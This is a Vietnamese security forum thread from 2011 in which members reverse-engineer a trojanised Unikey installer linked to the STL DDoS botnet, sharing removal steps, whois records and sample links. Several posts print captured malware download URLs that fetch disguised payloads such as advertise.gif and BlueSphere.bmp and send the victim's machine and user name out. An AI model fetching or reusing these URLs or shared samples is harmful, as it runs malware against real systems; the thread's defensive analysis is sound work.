banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Phân tích tính chất vài trận DDoS HVA vừa qua.  XML
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 09:05:18 (+0700) | #181 | 244265
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Dựa trên file Fake_Unikey của asaxin, à, "giờ em đã hiểu tại sao" lại có mấy cái Bmp bự bà cố, toàn data rác trong cái đống mshelpcenter.*, thumbcache.db, _desktop.ini.

Ặc ặc, ngồi chưa nóng đxx thì sếp rép, phải chạy đi lên chợ Dân Sinh mua đồ rồi !
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 09:05:52 (+0700) | #182 | 244266
acoustics89
Member

[Minus]    0    [Plus]
Joined: 08/07/2011 10:17:19
Messages: 50
Offline
[Profile] [PM]
Bộ MSHelpCenter mới và cũ không khác nhau:
Kịch bản thế này:
- Fake Unikey dump ra bộ "mèo" MSHelpCenter, với size nhỏ.
- Fake Unikey vỗ béo đám "mèo" này cho béo hơn, size lớn hơn ( tăng lên tới 9MB ). Việc này không khó vì chỉ cần nới rộng kích thước resource rồi ghi 0 vào. Đám mèo này béo nên khó up lên các trang quét virus trực tuyến. Mỗi lần chạy size này lại khác nhau, nếu lấy chữ ký của file không cẩn thận hoặc chỉ diệt theo MD5 thì chưa chắc đã quét được hết đám "mèo".
- Fake Unikey sửa lại file Unikey.exe ban đầu, thành file exe thật. xoá sạch dấu vết.

@TQN: hôm trước em bảo mà , bọn này code thì ít mà toàn sh!t bên trong
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 09:08:12 (+0700) | #183 | 244267
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

PXMMRF wrote:

Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.
 


Hì hì, câu này anh Mai nói ngược rồi. Bởi vì hầu hết dùng Windows XP và chỉ có 5-8% dùng Windows 7 (trong số người dùng Windows 7 thỉ chỉ có 30-40% bị nhiễm) cho nên dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN.

Sau kết quả điều tra sơ khởi, em thấy cả hệ thống máy của một trường đại học đều ấn định người dùng có chủ quyền "Administrator" và hàng chục doanh nghiệp lớn/vừa cũng không tránh khỏi lỗ hổng này. Trong con số 20 người dùng máy bình mà em hỏi thăm thì 100% là chạy dưới chủ quyền "Administrator". Bởi vậy, dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN chớ không phải "khó" smilie .
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 10:22:44 (+0700) | #184 | 244272
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
Em dùng Process Explorer để verify MSHelpCenter,exe nhưng không được



Đây là 4 file trong thư mục Microsoft Help
http://www.mediafire.com/?m5hljr2c17q5ueh

Còn đây la file pcap em save lại từ wireshark ( em cho wireshark capture trước rồi chạy file UniKey, để nó chạy khoảng hơn 5 phút rồi save lại )
http://www.mediafire.com/?f0t4rhkavn5nmyf
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 10:34:02 (+0700) | #185 | 244275
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
Lưu ý: Thư mục "Microsoft Help" không có trong Windows XP, nó sinh ra khi em chạy file Face_UniKey
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 10:38:02 (+0700) | #186 | 244276
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Cảm ơn mv1098. Vì nó mạo danh file của MS nên làm gì verify được signature.
Em cứ xoá hết thư mục đó đi. Vào Registry, seach "MsHelpCenter.exe" rồi delete các key, data liên quan.

2 lequy: Toàn bộ file trong BackupUtility cũng là virus, cậu nên kill process BackupSvc, xoá hết các file đó đi, vào Registry search và clean luôn.
Hai file exe: BackupScv.exe và DbCompact.exe chỉ làm nhiệm vụ đơn giản, load, tự xoá. Còn toàn bộ code của virus nằm trong file DbEntry1.idx. Dll giả đuôi .idx

Cũng là trò mạo danh file của MS.

Trong SysInternals Suite, có file sigcheck, để check signature của 1 PE file.
Chỉ cần sigcheck <file cần check>, nếu thấy unsigned thì gần như 95% là virus.

Trong WinDbg có tool symchk. Các file của MS gần như 100% đều có symbol file đặt trên Symbol Server của họ.
Cú pháp: symchk /v <file can check>
Nếu có .pdb, .dbg file về thì gần như an toàn, còn không có mà sigcheck fail nữa thì 100% mày là virus.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 11:00:43 (+0700) | #187 | 244280
lequi
Member

[Minus]    0    [Plus]
Joined: 29/04/2007 18:13:32
Messages: 77
Offline
[Profile] [PM]
@TQN: Ok a, e đã copy mấy file này sang một nơi khác và nén lại, phòng hờ khi cần.

Vậy sau 7 trang điều tra, mọi người đã có phương án gì để diệt đống này chưa ta ?
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 11:22:22 (+0700) | #188 | 244282
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
2 lequy: à quên, anh đang phân tích DbEntry1.idx, nó còn vài thằng bà con nữa: DbEntry2.idx, DbEntry3.idx. Em cứ search DbEntry*.* rồi up lên nhen !

Đống này chắc chắn là "mèo què" của STL, mới hơn MsHelpCenter, build trong thời gian từ 4/3 đến 10/3.

Phương án anh đã đề nghị là cứ up hết lên cho các AVs để họ cập nhật.

Và dưới đây là hình tui đã debug được con DbEntry1.idx làm gì, down cái gì về:



Down advertise.gif về, giả mã ra PE file, execute nó.

Host express.blogdns.info có IP là: 91.211.118.119, vẫn còn sống nhăn răn, nhưng giờ này thì không mở port nào. Vì vậy nên advertise.gif em lấy về không được.

IPNetInfo cho ra thông tin sau:
Code:
inetnum:         91.211.116.0 - 91.211.119.255
netname:         net-0x2a
descr:           Zharkov Mukola Mukolayovuch
remarks:         Datacentre "0x2a"
country:         UA
org:             ORG-PEZM1-RIPE
admin-c:         ZN210-RIPE
tech-c:          ZN210-RIPE
status:          ASSIGNED PI
mnt-by:          RIPE-NCC-END-MNT
mnt-lower:       RIPE-NCC-END-MNT
mnt-by:          ONIK-MNT
mnt-routes:      ONIK-MNT
mnt-domains:     ONIK-MNT
changed:         <a href="mailto:support@netassist.kiev.ua">support@netassist.kiev.ua</a> 20081211
source:          RIPE

organisation:   ORG-PEZM1-RIPE
org-name:       Private Entreprise Zharkov Mukola Mukolayovuch
org-type:       OTHER
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
e-mail:         <a href="mailto:support@0x2a.com.ua">support@0x2a.com.ua</a>
admin-c:        ZN210-RIPE
phone:          +38-044 587-83-16
mnt-ref:        ONIK-MNT
mnt-by:         ONIK-MNT
changed:        <a href="mailto:support@netassist.kiev.ua">support@netassist.kiev.ua</a> 20091215
source:         RIPE

person:         Zharkov Nikolay
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
phone:          +38-044 587-83-16
nic-hdl:        ZN210-RIPE
mnt-by:         ONIK-MNT
changed:        <a href="mailto:support@netassist.kiev.ua">support@netassist.kiev.ua</a> 20081211
source:         RIPE

% Information related to '91.211.116.0/22AS48587'

route:          91.211.116.0/22
descr:          Datacentre "0x2a" Route object
origin:         AS48587
mnt-by:         ONIK-MNT
changed:        <a href="mailto:pavel@antidot.ua">pavel@antidot.ua</a> 20081215
source:         RIPE


UA: Ukraina. Không biết có liên quan tới tụi mafia Nga như anh PXMMRF đã nói không ?
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 12:26:48 (+0700) | #189 | 244289
lequi
Member

[Minus]    0    [Plus]
Joined: 29/04/2007 18:13:32
Messages: 77
Offline
[Profile] [PM]
2 file còn lại nằm cùng thư mục, nhưng vì hôm qua nén lại mấy trăm mb nên e bỏ bớt.

http://www.mediafire.com/?7f9ag2r998797gl
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 12:31:01 (+0700) | #190 | 244290
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Tối hôm qua mò vô direct.aliasx.net để xem thử "mệnh lệnh" hiện nay là gì thì không được vì "mệnh lệnh" biến đâu mất tiêu.

Hôm nay vô lại thì hoàn toàn không được. Hoá ra:


[conmale]$ whois aliasx.net

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: ALIASX.NET
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Whois Server: whois.PublicDomainRegistry.com
Referral URL: http://www.PublicDomainRegistry.com
Name Server: NS1.SURATIT.IN
Name Server: NS2.SURATIT.IN
Name Server: NS3.SURATIT.IN
Name Server: NS4.SURATIT.IN
Status: clientDeleteProhibited
Status: clientHold
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 25-jul-2011
Creation Date: 08-apr-2011
Expiration Date: 08-apr-2012

>>> Last update of whois database: Wed, 27 Jul 2011 05:50:48 UTC <<<


The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Registration Service Provided By: SH3LLS
Contact: +852.58080443
Website: http://www.sh3lls.net/

Domain Name: ALIASX.NET

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676

Creation Date: 08-Apr-2011
Expiration Date: 08-Apr-2012

Domain servers in listed order:
ns1.suratit.in
ns2.suratit.in
ns3.suratit.in
ns4.suratit.in


Administrative Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676

Technical Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676

Billing Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676

Status:SUSPENDED 


Hiện nay đám hosting iWeb và đám domain registrar "SH3LLS" này vẫn còn host một số "kho tàng" của STL. Đám này hết chơi OnlineNIC ở Hồng Kông rồi đến sh3lls cũng ở Hồng Kông, toàn là những nơi tàng chứa những domain frauds. Còn hosting thì kiếm mấy chỗ chai lì để chứa những thứ độc hại. Có lẽ STL nghĩ rằng chuyển sang núp bóng ở Hồng Kông thì tụi FBI không mó tay vô được chắc smilie .
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 12:42:34 (+0700) | #191 | 244292
lequi
Member

[Minus]    0    [Plus]
Joined: 29/04/2007 18:13:32
Messages: 77
Offline
[Profile] [PM]
@TQN: Trong mớ packet em capture thì cũng thấy URL này, và của e là đây:

http://fastupdate.dyndns-office.com/advertise.gif?cv=1&uv=1&uc=0&lrp=4&sye=0&v=0&id=08vWdU7mjkAqVg5oiy7O799iqUzTK46n&als=6D21494831435D&cn=LEQUY-PC&us=LeQuy&qmnhnqzdptpgwfkfkn=prplnfiydcrrmmshaxmypr
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 13:09:29 (+0700) | #192 | 244296
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

TQN wrote:


Host express.blogdns.info có IP là: 91.211.118.119, vẫn còn sống nhăn răn, nhưng giờ này thì không mở port nào. Vì vậy nên advertise.gif em lấy về không được.

IPNetInfo cho ra thông tin sau:
Code:
inetnum:         91.211.116.0 - 91.211.119.255
netname:         net-0x2a
descr:           Zharkov Mukola Mukolayovuch
remarks:         Datacentre "0x2a"
country:         UA
org:             ORG-PEZM1-RIPE
admin-c:         ZN210-RIPE
tech-c:          ZN210-RIPE
status:          ASSIGNED PI
mnt-by:          RIPE-NCC-END-MNT
mnt-lower:       RIPE-NCC-END-MNT
mnt-by:          ONIK-MNT
mnt-routes:      ONIK-MNT
mnt-domains:     ONIK-MNT
changed:         <a href="mailto:support@netassist.kiev.ua">support@netassist.kiev.ua</a> 20081211
source:          RIPE

organisation:   ORG-PEZM1-RIPE
org-name:       Private Entreprise Zharkov Mukola Mukolayovuch
org-type:       OTHER
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
e-mail:         <a href="mailto:support@0x2a.com.ua">support@0x2a.com.ua</a>
admin-c:        ZN210-RIPE
phone:          +38-044 587-83-16
mnt-ref:        ONIK-MNT
mnt-by:         ONIK-MNT
changed:        <a href="mailto:support@netassist.kiev.ua">support@netassist.kiev.ua</a> 20091215
source:         RIPE

person:         Zharkov Nikolay
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
phone:          +38-044 587-83-16
nic-hdl:        ZN210-RIPE
mnt-by:         ONIK-MNT
changed:        <a href="mailto:support@netassist.kiev.ua">support@netassist.kiev.ua</a> 20081211
source:         RIPE

% Information related to '91.211.116.0/22AS48587'

route:          91.211.116.0/22
descr:          Datacentre "0x2a" Route object
origin:         AS48587
mnt-by:         ONIK-MNT
changed:        <a href="mailto:pavel@antidot.ua">pavel@antidot.ua</a> 20081215
source:         RIPE


UA: Ukraina. Không biết có liên quan tới tụi mafia Nga như anh PXMMRF đã nói không ?
 



Anh nghĩ không phải mafia Nga gì đâu mà STL cũng có servers bên Ukraine (có lẽ nghĩ rằng host bên Ukraine thì tụi FBI không mó tay vô được smilie ). Chuỗi 91.211.116.0/22 kia cũng chứa trang "tuyệt tác" x-cafevn-db.info trước kia.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 13:24:53 (+0700) | #193 | 244298
texudo
Member

[Minus]    0    [Plus]
Joined: 20/07/2011 11:14:04
Messages: 31
Offline
[Profile] [PM]
Qua thông tin X-Cafe và IP, search ra một đống Domain với IP bắt đầu bằng 91.211.116.*.

http://bgp.he.net/net/91.211.116.0/22#_dns

Chính xác là SINHTULENH rồi: 91.211.116.185 sinhtulenh.org, sinhtuphu.org

[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 13:31:31 (+0700) | #194 | 244299
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

lequi wrote:
@TQN: Trong mớ packet em capture thì cũng thấy URL này, và của e là đây:

http://fastupdate.dyndns-office.com/advertise.gif?cv=1&uv=1&uc=0&lrp=4&sye=0&v=0&id=08vWdU7mjkAqVg5oiy7O799iqUzTK46n&als=6D21494831435D&cn=LEQUY-PC&us=LeQuy&qmnhnqzdptpgwfkfkn=prplnfiydcrrmmshaxmypr 


fastupdate.dyndns-office.com resolved về "204.13.248.126" và IP này nằm trong blacklist của nhiều database vì nổi tiếng malware. Nó bị "đóng cửa" từ hồi 2010. IP này trỏ tới hơn 500 hostname, toàn là những thứ "đầu trâu mặt ngựa" của Internet. Không biết phải có liên quan tới STL không.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 13:54:51 (+0700) | #195 | 244302
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Vậy là với con này, mình đã truy tới ổ của nó rồi.

Sorry nhiều anh em, con này down advertise.gif từ 4 host lận. Host nào down không được thì chuyển sang down từ host khác. Trưa nay buồn ngủ nên chỉ debug tới host đầu tiên, tưởng hết nên terminate luôn.
Code:
1. http://express.blogdns.info/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abcde&us=abc

2. http://fastupdate.dyndns-office.com/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abcde&us=abc

3. http://hot.enfaqs.com/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abcde&us=abc

4. http://securelogin.doomdns.com/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abc&us=abc


Cảm ơn lequy, cậu không nói thì chắc tui đã không biết và bỏ sót.
Trong 4 cái host trên, cái thì chết, cái thì đóng port 80. Chỉ còn một mình thằng fastupdate.dyndns-office.com là còn respond cho lệnh download, và nó chỉ trả về cho em cái này:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>fastupdate.dyndns-office.com is offline</title></head>
<body><h1>fastupdate.dyndns-office.com is offline</h1><hr>
<p>fastupdate.dyndns-office.com is currently offline. Please try again later.</p>
</body></html>
 

Buồn thiệt, không thì anh em ta có được con bot mới nữa rồi.

Thôi, nhiệm vụ kế tiếp là up các mẫu MsHelpCenter còn rin extract từ "Unikey độc" (theo anh PXMMRF) của asaxin và BackupUtility lên KIS, MS, Avira...
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 14:34:38 (+0700) | #196 | 244305
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

conmale wrote:

PXMMRF wrote:

Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.
 


Hì hì, câu này anh Mai nói ngược rồi. Bởi vì hầu hết dùng Windows XP và chỉ có 5-8% dùng Windows 7 (trong số người dùng Windows 7 thỉ chỉ có 30-40% bị nhiễm) cho nên dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN.

Sau kết quả điều tra sơ khởi, em thấy cả hệ thống máy của một trường đại học đều ấn định người dùng có chủ quyền "Administrator" và hàng chục doanh nghiệp lớn/vừa cũng không tránh khỏi lỗ hổng này. Trong con số 20 người dùng máy bình mà em hỏi thăm thì 100% là chạy dưới chủ quyền "Administrator". Bởi vậy, dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN chớ không phải "khó" smilie




Hì hì, câu này mình nói với ý khác. Vì axasin thông báo là cài cái Malicious Unikey mà bạn ấy download về chỉ tạo các file virus MSHelpCenter.* trong Windows 7 thôi , còn trong Win XP thì không được (nghĩa là Win XP thì không bị nhiễm virus khi cài malicious Unikey nói trên). Vì số người ở VN dùng Win 7 còn ít, nên tôi suy diễn tiếp theo ý axasin như vậy (cũng có ý rỡn vui với rang0 chút chút)

Đây là suy diễn theo nhận định của axasin. Chứ tôi đương nhiên là không nghĩ như vậy. Tôi nghĩ máy trên mạng VN hầu hết là cài Win XP và tỷ lệ máy cài Win XP bị nhiễm STL virus-trojan là rất cao.
Cần nói thêm là hiện đang có nhiều loại (version) malicious Unikey và Vietkey trên mạng. Malicious Unikey mà axasin cài khác với của lequi đã cài. Còn có nhiều malicious Unikey khác trên mang nũa. Kinh!

[Hì hì các bác đừng gọi là "fake Unikey", vì nó vẫn dùng được để đánh chữ Việt mà. Nên gọi là malicious Unikey (Unikey độc). Giả thì không dùng đươc. Nhưng Unikey nhiễm độc (malicious) thì vẫn dùng được, nhưng lai nguy hiểm cho ta hơn ngàn lần. Hì hì. Nhưng đây chỉ là khuyến cáo vui thôi!]

Đúng là hầu hết máy tính cá nhân ở Việt nam (tai tư gia, cơ quan) đều cài đặt cho user dưới quyến admin.. Win XP rõ ràng là cũng hỗ trợ việc này thưc hiện dễ dàng trong quá trình cài đặt nó. Việc phân quyên cho user trên Win XP còn đơn giản và thiếu bảo mật hơn Win 2000.
Nhưng nghĩ lai thì lại thấy khó: máy riêng của nó, hay phân cho mình nó dùng tại cơ quan, thì hà cớ gì bắt nó chỉ đươc dùng account restricted hay account limited. Khó thật.

Chuyên vui (có thưc): Vừa qua công ty tôi các máy tính bị nhiễm virus nặng nề, lây lan lung tung, mất dữ liêu, do anh em có quyền admin. tự động cài nhiều chương trình game, nghe nhạc nhiễm virus. Tôi nổi điên lên, yêu cầu tất cả công ty mang máy lên văn phòng để phân quyên lại: không cho dùng quyên admin, chỉ cho dùng quyền restricted hay limited. Gần trăm máy mang lên, xếp hàng, trông hết hồn. Lệnh đã ra phải làm, không kỳ. Tôi và 2 lão Kỹ sư IT phải mất gần 3 ngày để phân quyền, dọn dep rác rưởi, update antivirus và cài lai các máy in, máy scan, nâng cấp RAM.... Mệt quá. Nhưng rõ ràng sau đó tình hình đỡ hơn nhiều. Gần đây lai phải tổ chức 1 lớp hoc sử dung máy tính trong nôi bộ cơ quan.....

To "TQN". Ucraina có một mối quan hệ rất sâu sắc với TQ, đăc biệt trong thời kỳ tổng thống cũ, khi mà môi quan hệ giữa Nga và Ukrain xấu, rạn nứt. TQ trơ giúp Ucrain rất nhiều về Ktế và đầu tư một số vốn khá lơn vào nước này




The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 15:35:12 (+0700) | #197 | 244310
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]
Như vậy là cho đến nay chúng ta đã phát hiện ra khoảng 10 domain STL sử dung cho 10 master website-webserver khác nhau.

Một số website-webserver đã tạm thời ngưng hoăc mất domain.

Vấn đề chúng ta chưa xác định thật rõ là website-webserver nào đang in-charge (đang làm nhiệm vụ DDoS), như đang DDoS vào HVA chẳng hạn, cái nào đã thôi dùng.?

Chúng ta cũng chưa phân tích và tổng hơp các thông tin về nguồn (website, webserver) mà STL hay người khác (bị STL lơi dung) dùng để phát tán virus, thí dụ http://nethoabinh.com/ mà lequi đã xác nhận.

Về virus-trojan chúng ta cũng còn chưa rõ là ngoài nhóm file MShelpcenter.*... tạo ra từ malicious Unikey mà lequi download về từ đường dẫn của http://nethoabinh.com/, có còn có các nhóm file loại khác, tên khác nhưng công dung tương tự không?. MShelpcenter.* files có là những file mới nhất của STL không.?

STL cũng nhúng virus-Trojan vào các file Vietkey (2000-2002-2007) đang được upload rất nhiêu trên mạng. Chúng đươc STL nhúng vào các virus-trojan loai gì, có giống như ở Unikey không?
Còn phải kể những file Adobe flash Player dễ dàng download trên mạng, cũng thường bị STL nhúng virus-trojan vào.

Rõ ràng đang còn rất nhiều vấn đề cần phải nghiên cứu, tìm hiểu và giải quyết.



The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 15:45:11 (+0700) | #198 | 244312
acoustics89
Member

[Minus]    0    [Plus]
Joined: 08/07/2011 10:17:19
Messages: 50
Offline
[Profile] [PM]
Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi.
nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác

Các anh có ý kiến gì để làm việc hiệu quả hơn không
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:00:12 (+0700) | #199 | 244314
rang0
Member

[Minus]    0    [Plus]
Joined: 25/07/2011 10:55:47
Messages: 19
Offline
[Profile] [PM]
Gửi anh PXMMRF,

Hôm nay em ngồi đọc lại, thấy còn 1 bộ Unikey "độc" mà gần đây nhất được upload trên trang download.com.vn, hình như nay đã được gỡ xuống, chính nó drop ra file TeamViewer "giả" và file uxtheme.manifest "giả". Vào thời điểm anh TQN phân tích thì cái server của nó vẫn còn sống, và anh TQN có down về được 2 files : flower.bmp và BlueSphere.bmp.

File BlueSphere.bmp decrypt ra nó chính là 1 file .exe, mạo danh thành file svchost.exe, tại thời điểm đó thì file .exe này chưa làm gì cả, và sẽ được cập nhật trong thời gian không xa. Hiện tại bọn STL đang "tạm thời" off server đó, chỉ không biết một ngày đẹp trời nào đó nó sẽ được bật lại để cập nhật hay không mà thôi ? Hay bọn chúng đành hi sinh con malware và server này vì bị phát hiện quá sớm.

Code:
URL1: http://speed.cyline.org:443/flower.bmp?g={1CD70F27-EA66-4812-834C-FB39AE2DC170}&c=1&v=1&tf=312218282815&tr=312218282861&t=312218282864&p=2&e=0&n=ThangChaMayTuiSTL&u=OngNoiMayNe&lfhbbnwdbywxlineyegfswjxylrktvvfjqlr=vznmbfhxpgocvojqhosgdbenhrjtnglagonsvca
URL2: http://speed.cyline.org:443/BlueSphere.bmp?dl=1&oyeerpsaahqumkthxeswvwlfdxpizmffsfk=njhkmdjqlnkwmrofymzmxgqf
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:13:25 (+0700) | #200 | 244318
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Tớ vừa thử nghiệm thì 3 copies khác nhau của unikey download từ
- nethoabinh.com
- code.google.com: http://code.google.com/p/vietnam-unikey/downloads/detail?name=Uk40RC1ntSetup.exe&can=2&q=
- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)

đều y như nhau và đều là malware..

Bản trên code.google.com được upload ngày 17 tháng 3 năm 2010.
Bản trên sourceforge được upload ngày 19 tháng 4 năm 2006.

Cả ba bản trên có y hệt checksum và nội dung y hêt nhau.

Chỉ còn 1 cách là gởi thông tin đến tất cả các cty antivirus.

What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:18:57 (+0700) | #201 | 244319
rang0
Member

[Minus]    0    [Plus]
Joined: 25/07/2011 10:55:47
Messages: 19
Offline
[Profile] [PM]

conmale wrote:

- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)
 


Em vừa down thử từ nguồn này về, thấy nó sạch mà anh !?
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:26:15 (+0700) | #202 | 244320
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

acoustics89 wrote:
Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi.
nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác

Các anh có ý kiến gì để làm việc hiệu quả hơn không 


Anh nghĩ có 3 mảng để lo:

1. RE.
2. Trace net và xác định mạng hoạt động của malware.
3. Report cho các nhóm antiviruses và các nhóm chức năng.

Nếu cần làm việc hữu hiệu có lẽ cần phải tạo một group list (dùng google group chẳng hạn). Trong đó, thành viên của nhóm liên lạc qua group và chỉ nên công bố thông tin trên diễn đàn sau khi tìm ra kết quả hoặc nếu cần các thành viên trên diễn đàn đóng góp thêm thông tin, mẫu mã.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:26:28 (+0700) | #203 | 244321
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
